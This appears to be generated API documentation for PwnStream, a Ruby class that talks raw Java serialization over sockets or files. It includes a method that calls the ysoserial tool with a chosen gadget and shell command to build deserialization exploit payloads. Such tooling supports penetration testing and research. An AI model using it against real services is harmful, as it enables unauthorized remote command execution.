Class: ObjectPwnStream::PwnStream

Inherits:

Object

• Object
• ObjectPwnStream::PwnStream

Includes:

ObjectInputStream, ObjectOutputStream

Defined in:

lib/ObjectPwnStream/PwnStream.rb

Constant Summary

Constants included from Constants

Constants::BASE_WIRE_HANDLE, Constants::STREAM_MAGIC, Constants::STREAM_VERSION, Constants::TC_ARRAY, Constants::TC_BLOCKDATA, Constants::TC_BLOCKDATALONG, Constants::TC_CLASS, Constants::TC_CLASSDESC, Constants::TC_ENDBLOCKDATA, Constants::TC_ENUM, Constants::TC_EXCEPTION, Constants::TC_LONGSTRING, Constants::TC_NULL, Constants::TC_OBJECT, Constants::TC_PROXYCLASSDESC, Constants::TC_REFERENCE, Constants::TC_RESET, Constants::TC_STRING

Instance Attribute Summary

• #instream ⇒ Object readonly

  Returns the value of attribute instream.

• #outstream ⇒ Object readonly

  Returns the value of attribute outstream.

Instance Method Summary

• #close! ⇒ Object
• #connect! ⇒ Object
• #initialize(host: nil, port: nil, file_path: nil, connect: false) ⇒ PwnStream constructor

  A new instance of PwnStream.

• #open_streams! ⇒ Object
• #ysoserial_generate!(ysoserial_path, gadget, cmd, java_path: nil, encode: false, windows: false) ⇒ Object

Methods included from ObjectInputStream

check_stream_header, #handle_reset, #open_input_stream, #read_boolean, #read_byte, #read_bytes, #read_char, #read_chars, #read_double, #read_float, #read_int, #read_long, #read_object, #read_short, #read_utf

Methods included from ObjectOutputStream

#open_output_stream, #reset!, #write_boolean, #write_byte, #write_bytes, #write_char, #write_chars, #write_double, #write_float, #write_int, #write_long, #write_object, #write_short, #write_utf

Constructor Details

#initialize(host: nil, port: nil, file_path: nil, connect: false) ⇒ PwnStream

Returns a new instance of PwnStream.

# File 'lib/ObjectPwnStream/PwnStream.rb', line 19

def initialize(host: nil, port: nil, file_path: nil, connect: false)
  if file_path.nil?
    @host = host
    @port = port.to_i
    connect! if connect
  else
    @file_mode = true
    @file_path = file_path
    connect! if connect
  end
end

Instance Attribute Details

#instream ⇒ Object (readonly)

Returns the value of attribute instream.

# File 'lib/ObjectPwnStream/PwnStream.rb', line 18

def instream
  @instream
end

#outstream ⇒ Object (readonly)

Returns the value of attribute outstream.

# File 'lib/ObjectPwnStream/PwnStream.rb', line 18

def outstream
  @outstream
end

Instance Method Details

#close! ⇒ Object

# File 'lib/ObjectPwnStream/PwnStream.rb', line 44

def close!
  @outstream.flush
  @outstream.close
  @instream.close
  @socket, @file_path, @instream, @outstream, @file_mode = nil
end

#connect! ⇒ Object

# File 'lib/ObjectPwnStream/PwnStream.rb', line 31

def connect!
  unless @file_mode
    @socket ||= TCPSocket.open(@host, @port)
    @socket.setsockopt(Socket::IPPROTO_TCP, Socket::TCP_NODELAY, 1)
    @socket.sync = true
    @instream = @outstream = @socket
  else
    @outstream ||= File.open(@file_path, 'wb')
    @instream ||= File.open(@file_path, 'rb')
    @outstream.sync = true
  end
end

#open_streams! ⇒ Object

# File 'lib/ObjectPwnStream/PwnStream.rb', line 65

def open_streams!
  open_output_stream
  open_input_stream
end

#ysoserial_generate!(ysoserial_path, gadget, cmd, java_path: nil, encode: false, windows: false) ⇒ Object

# File 'lib/ObjectPwnStream/PwnStream.rb', line 51

def ysoserial_generate!(ysoserial_path, gadget, cmd, java_path: nil, encode: false, windows: false)
  cmd = Utils.exec_encode(cmd, windows: windows) if encode
  ycmd = "#{java_path && '"'}#{java_path || 'java'}#{java_path && '"'} -jar \"#{ysoserial_path}\" #{gadget} \"#{cmd}\""
  stdout = Open3.capture3(ycmd, :binmode => true)[0]
  if stdout.empty?
    raise Errors::YsoserialGenerateError.new(ycmd)
  else
    ObjectInputStream.check_stream_header(stdout[...4].unpack("S>*"), provided: false)
    @payload = stdout[4..]
  end
end